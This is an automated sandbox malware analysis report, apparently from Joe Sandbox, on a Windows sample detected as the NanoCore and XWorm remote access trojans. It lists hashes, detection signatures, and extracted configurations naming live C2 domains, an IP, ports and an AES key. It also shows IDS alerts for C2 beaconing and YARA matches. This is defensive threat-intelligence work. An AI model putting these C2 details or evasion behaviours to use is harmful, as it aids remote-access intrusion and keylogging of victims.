Windows Analysis Report
new policy.scr.exe

Overview

General Information

Sample name: new policy.scr.exe
Analysis ID: 1502158
MD5: 01e7e40055d24780359493decf90ac21
SHA1: b59b66a3af3a9920b7de22975997a1ec1e4d5528
SHA256: 3a5134cc11c7c47b7268e7bf6bf1556c5ff5044af54b7931cae652bfd8d83717
Tags: exe, NanoCore, RAT

Detection

Nanocore, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Nanocore RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: new policy.scr.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Roaming\Networks!.exe Avira: detection malicious, Label: HEUR/AGEN.1323683
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "7065c9a5-e7ef-4b4a-9ad2-3b36dc82", "Group": "JksonN", "Domain1": "jacksonnnn233.theworkpc.com", "Domain2": "", "Port": 65535, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["airlineagancy.casacam.net"], "Port": "7076", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\Networks!.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\Networks!.exe Virustotal: Detection: 56% Perma Link
Source: new policy.scr.exe ReversingLabs: Detection: 55%
Source: new policy.scr.exe Virustotal: Detection: 56% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Networks!.exe Joe Sandbox ML: detected
Source: new policy.scr.exe Joe Sandbox ML: detected
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack String decryptor: airlineagancy.casacam.net
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack String decryptor: 7076
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack String decryptor: <123456789>
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack String decryptor: XWorm V5.6
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack String decryptor: USB.exe
Source: new policy.scr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: new policy.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\ARM\Desktop\ncsource\Plugins\CorePlugin\CoreClientPlugin\obj\Release\CoreClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp

Networking

Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 78.159.112.29:7076
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046909 - Severity 1 - ET MALWARE NanoCore RAT Keepalive Response 1 : 78.159.112.29:65535 -> 192.168.2.4:53344
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53345 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53347 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53349 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 78.159.112.29:7076
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53346 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53350 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2816718 - Severity 1 - ETPRO MALWARE NanoCore RAT Keep-Alive Beacon : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Network traffic Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Malware configuration extractor URLs: airlineagancy.casacam.net
Source: Malware configuration extractor URLs: jacksonnnn233.theworkpc.com
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Joe Sandbox View ASN Name: LEASEWEB-DE-FRA-10DE
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: jacksonnnn233.theworkpc.com
Source: global traffic DNS traffic detected: DNS query: airlineagancy.casacam.net
Source: global traffic DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://google.com
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.0000000002511000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.0000000002986000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: RegisterRawInputDevices memstr_a586111e-f

E-Banking Fraud


System Summary

Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
